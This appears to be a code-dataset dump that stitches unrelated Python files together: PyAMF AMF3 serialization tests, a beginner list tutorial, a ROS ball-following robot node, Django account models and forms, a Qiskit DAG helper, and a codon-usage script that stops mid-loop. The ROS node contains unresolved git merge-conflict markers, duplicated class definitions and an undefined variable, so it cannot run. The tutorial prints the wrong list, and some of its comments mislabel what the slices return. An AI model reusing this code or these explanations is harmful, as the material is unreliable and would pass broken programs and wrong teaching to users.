are encoded propertly
"""
class Foo:
class __amf__:
static = ('name', 'id', 'description')
x = Foo()
x.id = 1
x.name = 'foo'
x.description = None
y = Foo()
y.id = 2
y.name = 'bar'
y.description = None
self.encoder.writeElement([x, y])
self.assertEqual(
self.buf.getvalue(),
b'\t\x05\x01\n;\x01\x17description\x05id\tname\x01\x04\x01\x06\x07'
b'foo\x01\n\x01\x01\x04\x02\x06\x07bar\x01'
)
class ObjectDecodingTestCase(ClassCacheClearingTestCase, DecoderMixIn):
"""
"""
amf_type = pyamf.AMF3
def setUp(self):
ClassCacheClearingTestCase.setUp(self)
DecoderMixIn.setUp(self)
def test_object_references(self):
self.buf.write(b'\x0a\x23\x01\x03a\x03b\x06\x09spam\x04\x05')
self.buf.seek(0, 0)
obj1 = self.decoder.readElement()
self.buf.truncate()
self.buf.write('\n\x00')
self.buf.seek(0, 0)
obj2 = self.decoder.readElement()
self.assertEqual(id(obj1), id(obj2))
def test_static(self):
pyamf.register_class(Spam, 'abc.xyz')
self.buf.write(b'\x0a\x13\x0fabc.xyz\x09spam\x06\x09eggs')
self.buf.seek(0, 0)
obj = self.decoder.readElement()
class_def = self.context.getClass(Spam)
self.assertTrue("spam" in obj.__dict__)
self.assertEqual(class_def.static_properties, ['spam'])
self.assertTrue(isinstance(obj, Spam))
self.assertEqual(obj.__dict__, {'spam': 'eggs'})
def test_dynamic(self):
pyamf.register_class(Spam, 'abc.xyz')
self.buf.write(b'\x0a\x0b\x0fabc.xyz\x09spam\x06\x09eggs\x01')
self.buf.seek(0, 0)
obj = self.decoder.readElement()
class_def = self.context.getClass(Spam)
self.assertEqual(class_def.static_properties, [])
self.assertTrue(isinstance(obj, Spam))
self.assertEqual(obj.__dict__, {'spam': 'eggs'})
def test_combined(self):
"""
This tests an object encoding with static properties and dynamic
properties
"""
pyamf.register_class(Spam, 'abc.xyz')
self.buf.write(b'\x0a\x1b\x0fabc.xyz\x09spam\x06\x09eggs\x07baz\x06\x07nat\x01')
self.buf.seek(0, 0)
obj = self.decoder.readElement()
class_def = self.context.getClass(Spam)
self.assertEqual(class_def.static_properties, ['spam'])
self.assertTrue(isinstance(obj, Spam))
self.assertEqual(obj.__dict__, {'spam': 'eggs', 'baz': 'nat'})
def test_external(self):
alias = pyamf.register_class(Spam, 'abc.xyz')
alias.external = True
self.buf.write(b'\x0a\x07\x0fabc.xyz')
self.buf.seek(0)
x = self.decoder.readElement()
self.assertTrue(isinstance(x, Spam))
self.assertEqual(x.__dict__, {})
class DataOutputTestCase(unittest.TestCase, EncoderMixIn):
"""
"""
amf_type = pyamf.AMF3
def setUp(self):
EncoderMixIn.setUp(self)
self.x = amf3.DataOutput(self.encoder)
def test_create(self):
self.assertEqual(self.x.encoder, self.encoder)
self.assertEqual(self.x.stream, self.buf)
def test_boolean(self):
self.x.writeBoolean(True)
self.assertEqual(self.buf.getvalue(), b'\x01')
self.buf.truncate()
self.x.writeBoolean(False)
self.assertEqual(self.buf.getvalue(), b'\x00')
def test_byte(self):
for y in range(10):
self.x.writeByte(y)
self.assertEqual(
self.buf.getvalue(),
b'\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09'
)
def test_double(self):
self.x.writeDouble(0.0)
self.assertEqual(self.buf.getvalue(), b'\x00' * 8)
self.buf.truncate()
self.x.writeDouble(1234.5678)
self.assertEqual(self.buf.getvalue(), b'@\x93JEm\\\xfa\xad')
def test_float(self):
self.x.writeFloat(0.0)
self.assertEqual(self.buf.getvalue(), b'\x00' * 4)
self.buf.truncate()
self.x.writeFloat(1234.5678)
self.assertEqual(self.buf.getvalue(), b'D\x9aR+')
def test_int(self):
self.x.writeInt(0)
self.assertEqual(self.buf.getvalue(), b'\x00\x00\x00\x00')
self.buf.truncate()
self.x.writeInt(-12345)
self.assertEqual(self.buf.getvalue(), b'\xff\xff\xcf\xc7')
self.buf.truncate()
self.x.writeInt(98)
self.assertEqual(self.buf.getvalue(), b'\x00\x00\x00b')
def test_object(self):
obj = pyamf.MixedArray(spam='eggs')
self.x.writeObject(obj)
self.assertEqual(self.buf.getvalue(), b'\t\x01\tspam\x06\teggs\x01')
self.buf.truncate()
# check references
self.x.writeObject(obj)
self.assertEqual(self.buf.getvalue(), b'\t\x00')
self.buf.truncate()
def test_object_proxy(self):
self.encoder.use_proxies = True
obj = {'spam': 'eggs'}
self.x.writeObject(obj)
self.assertEqual(
self.buf.getvalue(),
b'\n\x07;flex.messaging.io.ObjectProxy\n\x0b\x01\tspam\x06\teggs'
b'\x01'
)
self.buf.truncate()
# check references
self.x.writeObject(obj)
self.assertEqual(self.buf.getvalue(), b'\n\x00')
self.buf.truncate()
def test_object_proxy_mixed_array(self):
self.encoder.use_proxies = True
obj = pyamf.MixedArray(spam='eggs')
self.x.writeObject(obj)
self.assertEqual(
self.buf.getvalue(),
b'\n\x07;flex.messaging.io.ObjectProxy\n\x0b\x01\tspam\x06\teggs'
b'\x01'
)
self.buf.truncate()
# check references
self.x.writeObject(obj)
self.assertEqual(self.buf.getvalue(), b'\n\x00')
self.buf.truncate()
def test_object_proxy_inside_list(self):
self.encoder.use_proxies = True
obj = [{'spam': 'eggs'}]
self.x.writeObject(obj)
self.assertEqual(
self.buf.getvalue(),
b'\n\x07Cflex.messaging.io.ArrayCollection\t\x03\x01\n\x07;'
b'flex.messaging.io.ObjectProxy\n\x0b\x01\tspam\x06\teggs\x01'
)
def test_short(self):
self.x.writeShort(55)
self.assertEqual(self.buf.getvalue(), b'\x007')
self.buf.truncate()
self.x.writeShort(-55)
self.assertEqual(self.buf.getvalue(), b'\xff\xc9')
def test_uint(self):
self.x.writeUnsignedInt(55)
self.assertEqual(self.buf.getvalue(), b'\x00\x00\x007')
self.buf.truncate()
self.assertRaises(OverflowError, self.x.writeUnsignedInt, -55)
def test_utf(self):
self.x.writeUTF(u'ἔδωσαν')
self.assertEqual(
self.buf.getvalue(),
b'\x00\r\xe1\xbc\x94\xce\xb4\xcf\x89\xcf\x83\xce\xb1\xce\xbd'
)
def test_utf_bytes(self):
self.x.writeUTFBytes(u'ἔδωσαν')
self.assertEqual(
self.buf.getvalue(),
b'\xe1\xbc\x94\xce\xb4\xcf\x89\xcf\x83\xce\xb1\xce\xbd'
)
class DataInputTestCase(unittest.TestCase):
def setUp(self):
self.buf = util.BufferedByteStream()
self.decoder = amf3.Decoder(self.buf)
def test_create(self):
x = amf3.DataInput(self.decoder)
self.assertEqual(x.decoder, self.decoder)
self.assertEqual(x.stream, self.buf)
self.assertEqual(x.stream, self.decoder.stream)
def _test(self, bytes, value, func, *params):
self.buf.write(bytes)
self.buf.seek(0)
self.assertEqual(func(*params), value)
self.buf.truncate()
def test_boolean(self):
x = amf3.DataInput(self.decoder)
self.buf.write(b'\x01')
self.buf.seek(-1, 2)
self.assertEqual(x.readBoolean(), True)
self.buf.write(b'\x00')
self.buf.seek(-1, 2)
self.assertEqual(x.readBoolean(), False)
def test_byte(self):
x = amf3.DataInput(self.decoder)
self.buf.write(b'\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09')
self.buf.seek(0)
for y in range(10):
self.assertEqual(x.readByte(), y)
def test_double(self):
x = amf3.DataInput(self.decoder)
self._test(b'\x00' * 8, 0.0, x.readDouble)
self._test(b'@\x93JEm\\\xfa\xad', 1234.5678, x.readDouble)
def test_float(self):
x = amf3.DataInput(self.decoder)
self._test(b'\x00' * 4, 0.0, x.readFloat)
self._test(b'?\x00\x00\x00', 0.5, x.readFloat)
def test_int(self):
x = amf3.DataInput(self.decoder)
self._test(b'\x00\x00\x00\x00', 0, x.readInt)
self._test(b'\xff\xff\xcf\xc7', -12345, x.readInt)
self._test(b'\x00\x00\x00b', 98, x.readInt)
def test_multi_byte(self):
# TODO nick: test multiple charsets
x = amf3.DataInput(self.decoder)
self._test(
'this is a test',
'this is a test',
x.readMultiByte,
14, 'utf-8'
)
self._test(
b'\xe1\xbc\x94\xce\xb4\xcf\x89\xcf\x83\xce\xb1\xce\xbd',
u'ἔδωσαν',
x.readMultiByte,
13,
'utf-8'
)
def test_object(self):
x = amf3.DataInput(self.decoder)
self._test(
b'\t\x01\x09spam\x06\x09eggs\x01',
{'spam': 'eggs'},
x.readObject
)
# check references
self._test(b'\t\x00', {'spam': 'eggs'}, x.readObject)
def test_short(self):
x = amf3.DataInput(self.decoder)
self._test(b'\x007', 55, x.readShort)
self._test(b'\xff\xc9', -55, x.readShort)
def test_uint(self):
x = amf3.DataInput(self.decoder)
self._test(b'\x00\x00\x007', 55, x.readUnsignedInt)
def test_utf(self):
x = amf3.DataInput(self.decoder)
self._test(b'\x00\x0bhello world', u'hello world', x.readUTF)
self._test(
b'\x00\r\xe1\xbc\x94\xce\xb4\xcf\x89\xcf\x83\xce\xb1\xce\xbd',
u'ἔδωσαν',
x.readUTF
)
def test_utf_bytes(self):
x = amf3.DataInput(self.decoder)
self._test(
b'\xe1\xbc\x94\xce\xb4\xcf\x89\xcf\x83\xce\xb1\xce\xbd',
u'ἔδωσαν',
x.readUTFBytes,
13
)
class ClassInheritanceTestCase(ClassCacheClearingTestCase, EncoderMixIn):
"""
"""
amf_type = pyamf.AMF3
def setUp(self):
ClassCacheClearingTestCase.setUp(self)
EncoderMixIn.setUp(self)
def test_simple(self):
class A(object):
pass
alias = pyamf.register_class(A, 'A')
alias.static_attrs = ['a']
class B(A):
pass
alias = pyamf.register_class(B, 'B')
alias.static_attrs = ['b']
x = B()
x.a = 'spam'
x.b = 'eggs'
self.assertEncoded(
x,
b'\n+\x03B\x03a\x03b\x06\tspam\x06\teggs\x01'
)
def test_deep(self):
class A(object):
pass
alias = pyamf.register_class(A, 'A')
alias.static_attrs = ['a']
class B(A):
pass
alias = pyamf.register_class(B, 'B')
alias.static_attrs = ['b']
class C(B):
pass
alias = pyamf.register_class(C, 'C')
alias.static_attrs = ['c']
x = C()
x.a = 'spam'
x.b = 'eggs'
x.c = 'foo'
self.assertEncoded(
x,
b'\n;\x03C\x03a\x03b\x03c\x06\tspam\x06\teggs\x06\x07foo\x01'
)
class ComplexEncodingTestCase(unittest.TestCase, EncoderMixIn):
"""
"""
amf_type = pyamf.AMF3
class TestObject(object):
def __init__(self):
self.number = None
self.test_list = ['test']
self.sub_obj = None
self.test_dict = {'test': 'ignore'}
def __repr__(self):
return '<TestObject %r @ 0x%x>' % (self.__dict__, id(self))
class TestSubObject(object):
def __init__(self):
self.number = None
def __repr__(self):
return '<TestSubObject %r @ 0x%x>' % (self.__dict__, id(self))
def setUp(self):
EncoderMixIn.setUp(self)
pyamf.register_class(self.TestObject, 'test_complex.test')
pyamf.register_class(self.TestSubObject, 'test_complex.sub')
def tearDown(self):
EncoderMixIn.tearDown(self)
pyamf.unregister_class(self.TestObject)
pyamf.unregister_class(self.TestSubObject)
def build_complex(self, max=5):
test_objects = []
for i in range(0, max):
test_obj = self.TestObject()
test_obj.number = i
test_obj.sub_obj = self.TestSubObject()
test_obj.sub_obj.number = i
test_objects.append(test_obj)
return test_objects
def complex_trial(self):
to_cd = self.context.getClass(self.TestObject)
tso_cd = self.context.getClass(self.TestSubObject)
self.assertIdentical(to_cd.alias.klass, self.TestObject)
self.assertIdentical(tso_cd.alias.klass, self.TestSubObject)
self.assertEqual(self.context.getClassByReference(3), None)
def complex_encode_decode_test(self, decoded):
for obj in decoded:
self.assertEqual(self.TestObject, obj.__class__)
self.assertEqual(self.TestSubObject, obj.sub_obj.__class__)
def test_complex_dict(self):
complex = {'element': 'ignore', 'objects': self.build_complex()}
self.encoder.writeElement(complex)
self.complex_trial()
def test_complex_encode_decode_dict(self):
complex = {'element': 'ignore', 'objects': self.build_complex()}
self.encoder.writeElement(complex)
encoded = self.encoder.stream.getvalue()
context = amf3.Context()
decoded = amf3.Decoder(encoded, context).readElement()
self.complex_encode_decode_test(decoded['objects'])
def test_class_refs(self):
a = self.TestSubObject()
b = self.TestSubObject()
self.encoder.writeObject(a)
cd = self.context.getClass(self.TestSubObject)
self.assertIdentical(self.context.getClassByReference(0), cd)
self.assertEqual(self.context.getClassByReference(1), None)
self.encoder.writeElement({'foo': 'bar'})
cd2 = self.context.getClass(dict)
self.assertIdentical(self.context.getClassByReference(1), cd2)
self.assertEqual(self.context.getClassByReference(2), None)
self.encoder.writeElement({})
self.assertIdentical(self.context.getClassByReference(0), cd)
self.assertIdentical(self.context.getClassByReference(1), cd2)
self.assertEqual(self.context.getClassByReference(2), None)
self.encoder.writeElement(b)
self.assertIdentical(self.context.getClassByReference(0), cd)
self.assertIdentical(self.context.getClassByReference(1), cd2)
self.assertEqual(self.context.getClassByReference(2), None)
c = self.TestObject()
self.encoder.writeElement(c)
cd3 = self.context.getClass(self.TestObject)
self.assertIdentical(self.context.getClassByReference(0), cd)
self.assertIdentical(self.context.getClassByReference(1), cd2)
self.assertIdentical(self.context.getClassByReference(2), cd3)
class ExceptionEncodingTestCase(ClassCacheClearingTestCase, EncoderMixIn):
"""
Tests for encoding exceptions.
"""
amf_type = pyamf.AMF3
def setUp(self):
ClassCacheClearingTestCase.setUp(self)
EncoderMixIn.setUp(self)
def test_exception(self):
try:
raise Exception('foo bar')
except Exception as e:
self.encoder.writeElement(e)
value = self.buf.getvalue()
try:
self.assertEqual(
value,
b'\n\x0b\x01\x0fmessage\x06'
b'\x0ffoo bar\tname\x06'
b'\x13Exception\x01'
)
except:
self.assertEqual(
value,
b'\n\x0b\x01\tname\x06'
b'\x13Exception\x0f'
b'message\x06\x0ffoo bar\x01'
)
def test_user_defined(self):
class FooBar(Exception):
pass
try:
raise FooBar('foo bar')
except Exception as e:
self.encoder.writeElement(e)
value = self.buf.getvalue()
try:
self.assertEqual(
value,
b'\n\x0b\x01\x0fmessage\x06'
b'\x0ffoo bar\tname\x06\rFooBar\x01'
)
except:
self.assertEqual(
value,
b'\n\x0b\x01\tname\x06\rFooBar'
b'\x0fmessage\x06\x0ffoo bar\x01'
)
def test_typed(self):
class XYZ(Exception):
pass
pyamf.register_class(XYZ, 'foo.bar')
try:
raise XYZ('blarg')
except Exception as e:
self.encoder.writeElement(e)
value = self.buf.getvalue()
try:
self.assertEqual(
value,
b'\n\x0b\x0ffoo.bar\x0f'
b'message\x06\x0bblarg\t'
b'name\x06\x07XYZ\x01'
)
except:
self.assertEqual(
value,
b'\n\x0b\x0ffoo.bar\t'
b'name\x06\x07XYZ\x0f'
b'message\x06\x0bblarg\x01'
)
class ByteArrayTestCase(unittest.TestCase):
"""
Tests for L{amf3.ByteArray}
"""
def test_write_context(self):
"""
@see: #695
"""
obj = {'foo': 'bar'}
b = amf3.ByteArray()
b.writeObject(obj)
bytes = b.getvalue()
b.stream.truncate()
b.writeObject(obj)
self.assertEqual(b.getvalue(), bytes)
def test_context(self):
b = amf3.ByteArray()
c = b.context
obj = {'foo': 'bar'}
c.addObject(obj)
b.writeObject(obj)
self.assertEqual(b.getvalue(), b'\n\x0b\x01\x07foo\x06\x07bar\x01')
def test_read_context(self):
"""
@see: #695
"""
obj = {'foo': 'bar'}
b = amf3.ByteArray()
b.stream.write(b'\n\x0b\x01\x07foo\x06\x07bar\x01\n\x00')
b.stream.seek(0)
self.assertEqual(obj, b.readObject())
self.assertRaises(pyamf.ReferenceError, b.readObject)
def test_compressed(self):
"""
ByteArrays can be compressed. Test the C{compressed} attribute for
validity.
"""
try:
import zlib
except ImportError:
self.skipTest('zlib is missing')
ba = amf3.ByteArray()
self.assertFalse(ba.compressed)
z = zlib.compress(b'b' * 100)
ba = amf3.ByteArray(z)
self.assertTrue(ba.compressed)
z = zlib.compress(b'\x00' * 100)
ba = amf3.ByteArray(z)
self.assertTrue(ba.compressed)
|
10,529 | 4c25ecafd948b5923467710cbacf3c5ddbe1face | # list methods 2
# we will be going over some uses of lists
# let's first create 2 lists
my_first_list = [1, 2, 3, 4, 5]
my_second_list = [6, 7, 8, 9, 10]
# reversing a list
my_first_list.reverse()
print(my_first_list)
# sorting a list
my_second_list.sort()
print(my_second_list)
# adding 2 lists
my_third_list = my_first_list + my_second_list
print(my_first_list)
# counting elements
# we will count the number of occurences of a element
# this should return the number of times 6 is in the list
print(my_second_list.count(6))
# get index of element
# we will get the index of where 6 is in our list
print(my_second_list.index(6))
# splicing lists
# splicing means selecting only a part of a list
# this will assign all the elements from index 3 to index 8
spliced_list = my_third_list[3:8]
print(spliced_list)
# this will assign the first 5 elements in the list to spliced_list
spliced_list = my_first_list[:5]
print(spliced_list)
# this will assign all the elements from index 5 to the end
spliced_list = my_first_list[5:]
print(spliced_list)
# lists are good to work with loops
# this will print out all the elements in the list
for i in my_first_list:
print(i)
|
10,530 | 0164633c0119e72cce5e67a0ae9997dda8d0ffbd | #!/usr/bin/env python
import rospy, cv2, cv_bridge, numpy
from sensor_msgs.msg import Image
from geometry_msgs.msg import Twist
from std_msgs.msg import String
from nav_msgs.msg import Odometry
from darknet_ros_msgs.msg import BoundingBoxes, ObjectCount
from tf import TransformListener
from navigation.srv import *
MAX_ANGULAR_VEL = 0.0005
#<<<<<<< HEAD
flag=False
class Follower():
def __init__(self):
global flag
self.bridge = cv_bridge.CvBridge()
#cv2.namedWindow("window", 1)
self.depth_sub = rospy.Subscriber('/zed/zed_node/depth/depth_registered', Image, self.detect_callback)
self.image_sub = rospy.Subscriber('darknet_ros/bounding_boxes',BoundingBoxes, self.image_callback)
self.object_cnt_sub = rospy.Subscriber('/darknet_ros/found_object', ObjectCount, self.object_callback)
#=======
class Follower():
def __init__(self):
self.bridge = cv_bridge.CvBridge()
#cv2.namedWindow("window", 1)
self.image_sub = rospy.Subscriber('darknet_ros/bounding_boxes',BoundingBoxes, self.image_callback)
self.object_cnt_sub = rospy.Subscriber('/darknet_ros/found_object', ObjectCount, self.object_callback)
#>>>>>>> ebb477b30a378446953a3c1f3bbb31bb4523f352
self.cmd_vel_pub = rospy.Publisher('/cmd_vel',Twist, queue_size=5)
self.twist = Twist()
print("follower class initialised")
#<<<<<<< HEAD
self.rate = rospy.Rate(10)
flag=False
self.depth_data = []
def detect_callback(self, data):
bridge = cv_bridge.CvBridge()
depth_data = bridge.imgmsg_to_cv2(data)
#=======
self.rate = rospy.Rate(10)
#>>>>>>> ebb477b30a378446953a3c1f3bbb31bb4523f352
def image_callback(self, msg):
#take cx and cy from topic.Consider msg=[x_min,y_min,x_max,y_max]
self.valuexmin=msg.bounding_boxes[0].xmin
self.valuexmax=msg.bounding_boxes[0].xmax
self.valueymin=msg.bounding_boxes[0].ymin
self.valueymax=msg.bounding_boxes[0].ymax
#print(self.valuexmin)
#print(msg.bounding_boxes)
# <<<<<#<< HEAD
if msg.bounding_boxes[0].Class == "tennisball":
# if msg.bounding_boxes[0].Class == "sportsball":
# >>>>>>> ebb477b30a378446953a3c1f3bbb31bb4523f352
print("Detected Person")
self.cx = (self.valuexmin + self.valuexmax)/2
self.cy = (self.valueymin + self.valueymax)/2
#cv2.circle(Image, (self.cx, self.cy), 20, (0,0,255), -1)
#self.h, self.w, self.d = Image.shape
self.err = 640-self.cx
print("Error is: ",self.err)
self.twist.linear.x = 0
self.twist.angular.z = 0
# <<<<<<< HEAD
if (depth_data[self.cx][self.cy] > 1):
if((self.err)>250 or (self.err)<-250):
self.twist.angular.z = float(self.err) / 500
if self.twist.angular.z > MAX_ANGULAR_VEL:
self.twist.angular.z = MAX_ANGULAR_VEL
if self.twist.angular.z < -MAX_ANGULAR_VEL:
self.twist.angular.z = -MAX_ANGULAR_VEL
else:
self.twist.angular.z = 0
self.twist.linear.x = 0.1
else:
self.twist.angular.z = 0
self.twist.linear.x = 0 ################################################ ball is in range of 1m
self.cmd_vel_pub.publish(self.twist)
flag=True
#cv2.imshow('target',Image)
#cv2.waitKey(3)
#return AdjustResponse(True)
# =======
if((self.err)>250 or (self.err)<-250):
self.twist.angular.z = float(self.err) / 500
if self.twist.angular.z > MAX_ANGULAR_VEL:
self.twist.angular.z = MAX_ANGULAR_VEL
if self.twist.angular.z < -MAX_ANGULAR_VEL:
self.twist.angular.z = -MAX_ANGULAR_VEL
else:
self.twist.angular.z = 0
self.twist.linear.x = 0.001
self.cmd_vel_pub.publish(self.twist)
#cv2.imshow('target',Image)
#cv2.waitKey(3)
# >>>>>>> ebb477b30a378446953a3c1f3bbb31bb4523f352
print("Published Velocity", self.twist)
if "person" not in msg.bounding_boxes[0].Class:
self.twist = Twist()
for i in range(10):
self.twist = Twist()
self.cmd_vel_pub.publish(self.twist)
def object_callback(self, msg):
self.object_cnt = msg.count
if self.object_cnt == 0:
for i in range(10):
self.twist = Twist()
self.cmd_vel_pub.publish(self.twist)
self.rate.sleep()
# <<<<<<< HEAD
def execute(goal):
global flag
follower = Follower()
while not flag:
pass
return AdjustResponse(True)
if __name__ == "__main__":
try:
rospy.init_node('follower')
s = rospy.Service('adjust_service', Adjust, execute)
# =======
# if __name__ == "__main__":
# try:
# rospy.init_node('follower')
# follower = Follower()
# >>>>>>> ebb477b30a378446953a3c1f3bbb31bb4523f352
rospy.spin()
except Exception as e:
print("exception is: ", e)
|
10,531 | bb31cf5e6b6cc550c7ffe6a83fad9a133f140d38 | from django.contrib.auth.models import AbstractBaseUser
from django.contrib.auth.models import BaseUserManager
from django.db import models
#from review.views import ReviewViewSet
#import Review
from django.db.models import Avg
class AccountManager(BaseUserManager):
def create_user(self, email, password=None, **kwargs):
if not email:
raise ValueError('Users must have a valid email address.')
if not kwargs.get('username'):
raise ValueError('Users must have a valid username.')
account = self.model(
email=self.normalize_email(email), username=kwargs.get('username')
)
account.set_password(password)
account.save()
return account
def create_superuser(self, email, password, **kwargs):
account = self.create_user(email, password, **kwargs)
account.is_admin = True
account.save()
return account
class Account(AbstractBaseUser):
username = models.CharField(max_length=40, unique=True)
email = models.EmailField(unique=True)
first_name = models.CharField(max_length=40)
last_name = models.CharField(max_length=40)
tagline = models.CharField(max_length=140, blank=True)
is_admin = models.BooleanField(default=False)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
# The default image is default.png so we should always have it in media/userimages/
image = models.ImageField(upload_to='userimages/', default='userimages/default.png')
objects = AccountManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['username']
def __unicode__(self):
return self.username
def get_full_name(self):
return u' '.join([self.first_name, self.last_name])
def get_short_name(self):
return self.first_name
@property
def avg_rating(self):
from review import models
data = models.Review.objects.filter(reviewed_user=self.id).aggregate(avg_rating=Avg('rating__rating_grade')).values()
if data[0] == None:
return 'Not rated yet'
else:
return data[0]
@property
def avg_rating_round(self):
from review import models
data = models.Review.objects.filter(reviewed_user=self.id).aggregate(
avg_rating=Avg('rating__rating_grade')).values()
if data[0] == None:
return 'Not rated yet'
else:
return round(data[0])
class UserImage(models.Model):
user = models.ForeignKey(Account)
image = models.ImageField(max_length = None, upload_to='userimages', default = 'userimages/None-No-img.jpg')
|
10,532 | e687ed7ac8ef779cf18ed5ff3517d850ac88d4fb | # -*- coding: utf-8 -*-
from django import forms
from app.models import *
class LivroForm(forms.ModelForm):
class Meta:
model = Livro
fields = ['titulo', 'ano_publicacao', 'autor']
class AutorForm(forms.ModelForm):
class Meta:
model = Autor
fields = ['nome',] |
10,533 | f54896da89b093e96094f4b19cf451952e8e29e5 | # This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Helper function for converting a dag dependency to a dag circuit"""
from qiskit.dagcircuit.dagcircuit import DAGCircuit
def dagdependency_to_dag(dagdependency):
"""Build a ``DAGCircuit`` object from a ``DAGDependency``.
Args:
dag dependency (DAGDependency): the input dag.
Return:
DAGCircuit: the DAG representing the input circuit.
"""
dagcircuit = DAGCircuit()
dagcircuit.name = dagdependency.name
dagcircuit.metadata = dagdependency.metadata
dagcircuit.add_qubits(dagdependency.qubits)
dagcircuit.add_clbits(dagdependency.clbits)
for register in dagdependency.qregs.values():
dagcircuit.add_qreg(register)
for register in dagdependency.cregs.values():
dagcircuit.add_creg(register)
for node in dagdependency.topological_nodes():
# Get arguments for classical control (if any)
inst = node.op.copy()
dagcircuit.apply_operation_back(inst, node.qargs, node.cargs)
# copy metadata
dagcircuit.global_phase = dagdependency.global_phase
dagcircuit.calibrations = dagdependency.calibrations
return dagcircuit
|
10,534 | bc3112a6f179d78ec9c19c32f07c24e657abd589 | # Copyright (C) 2017 William M. Jacobs
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or (at
# your option) any later version.
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import argparse, sys, os, random, math, gzip, pickle, os.path
from collections import defaultdict
from itertools import combinations, combinations_with_replacement
import numpy as np
import scipy.stats
from codons import codon_to_aa, codon_table
#read a fasta file
def read_fasta(path):
seqs = []
keys = []
with open(path, 'r') as f:
for line in f:
if len(line) > 1 and '#' not in line:
if '>' in line:
seqs.append('')
keys.append(line[1:].strip())
else:
seqs[-1] += line.strip()
return {keys[i] : seqs[i] for i in range(len(keys))}
aa_codons = {aa : [c for c in codon_to_aa if codon_to_aa[c] == aa] \
for aa in codon_to_aa.values() if aa != 'Stop'}
#determines whether or not a codon is rare
def israre(codon_usage, rare_model, rare_threshold, c):
if rare_model == 'no_norm':
if codon_usage[c] <= rare_threshold:
return True
else:
return False
elif rare_model == 'cmax_norm':
if codon_usage[c] / max(codon_usage[cc] for cc in aa_codons[codon_to_aa[c]]) <= rare_threshold:
return True
else:
return False
def calc_codon_usage(fasta, abundances=None, output="", rare_model='no_norm', rare_threshold=0.1, max_len_diff=0.2, group_dpercentile=10, wt_gi='gi|556503834|ref|NC_000913.3|', gi_index=None, verbose=False):
#read fasta files
seqs = {}
if isinstance(fasta, str):
gene = "".join(os.path.basename(fasta).split(".")[:-1])
seqs[gene] = read_fasta(fasta)
elif isinstance(fasta, (list, tuple)):
for path in fasta:
gene = "".join(os.path.basename(path).split(".")[:-1])
seqs[gene] = read_fasta(path)
if verbose:
print("Loaded sequences for %d genes" % len(seqs))
gis = sorted(set(gi for gene in seqs for gi in seqs[gene].keys()))
#read abundance files
try:
with open(abundances, 'r') as f:
abundances = {line.split()[0] : float(line.split()[1]) for line in f if len(line) > 1 and line[0] != '#'}
except Exception as e:
abundances = {}
'''
if gi_index != None:
with open(gi_index, 'r') as f:
gi_index = {line.split()[0] : ' '.join(line.split()[1:]) \
for line in f if len(line) > 1 and line[0] != '#'}
print("GIs:")
for gi in gis:
print("%32s: %s" % (gi, gi_index[gi]))
'''
#delete the sequences whose length differs from the WT too much
nonwt_gis = [gi for gi in gis if gi != wt_gi]
for gene in seqs:
if wt_gi in seqs[gene]:
wtlen = len(seqs[gene][wt_gi]) - seqs[gene][wt_gi].count('-')
for gi in nonwt_gis:
if gi in seqs[gene]:
gilen = len(seqs[gene][gi]) - seqs[gene][gi].count('-')
if abs(1. - gilen / wtlen) > max_len_diff:
del seqs[gene][gi]
rerun_flag = False
try: # split sequences into deciles based on rare codon usage (calculated from first run)
with gzip.open(os.path.join(output, 'input_codon_usage.p.gz'), 'rb') as f:
input_relative_usage = pickle.load(f)['overall_codon_usage']
def get_frac_rare(seq):
return np.mean([sum(1 if israre(input_relative_usage[gi], rare_model, \
rare_threshold, seq[gi][3*i:3*(i + 1)]) else 0 \
for i in range(len(seq[gi]) // 3) if seq[gi][3*i:3*(i + 1)] != '---' \
and codon_to_aa[seq[gi][3*i:3*(i + 1)]] != 'Stop') / \
sum(1 for i in range(len(seq[gi]) // 3) if seq[gi][3*i:3*(i + 1)] != '---' \
and codon_to_aa[seq[gi][3*i:3*(i + 1)]] != 'Stop') \
for gi in gis if gi in seq])
frac_rare = {gene : get_frac_rare(seq) for gene,seq in seqs.items() if len(seq) > 0}
groups = ['ND'] + [(np.percentile(list(frac_rare.values()), percentile), \
np.percentile(list(frac_rare.values()), percentile \
+ group_dpercentile)) \
for percentile in range(0, 100, group_dpercentile)][::-1]
def get_gene_group(gene):
if len(seqs[gene]) == 0:
return 0
else:
x = get_frac_rare(seqs[gene])
for i in range(1, len(groups)):
if x >= groups[i][0] and x <= groups[i][1]:
return i
gene_group_labels = ['%05.3f:%05.3f' % (groups[i][0], groups[i][1]) \
if i > 0 else 'ND' for i in range(len(groups))]
except IOError: #this is the first run, get general usage info
rerun_flag = True
groups = ['all']
def get_gene_group(gene):
return 0
gene_group_labels = ['all']
except KeyError: #code was run in the same output directory, but on a different set of inputs (input_codon_usage.p.gz isn't correct)
os.remove(os.path.join(output, 'input_codon_usage.p.gz'))
rerun_flag = True
groups = ['all']
def get_gene_group(gene):
return 0
gene_group_labels = ['all']
gene_groups = {gene : get_gene_group(gene) for gene in seqs}
if verbose:
print("Gene groups:")
for i in range(len(gene_group_labels)):
print("%11s: n = %3d" % (gene_group_labels[i], \
sum(1 for gene in seqs if gene_groups[gene] == i)))
#compute codon usage
computed_codon_usage = {}
computed_codon_usage_unw = {}
computed_codon_usage_groupw = {}
absolute_usage = {}
relative_usage = {}
relative_usage_unw = {}
relative_usage_groupw = {}
for gi in gis:
computed_codon_usage[gi] = defaultdict(int)
computed_codon_usage_unw[gi] = defaultdict(int)
computed_codon_usage_groupw[gi] = [defaultdict(int) for i in range(len(groups))]
for gene,gene_seqs in seqs.items():
if gi in gene_seqs:
seq = gene_seqs[gi]
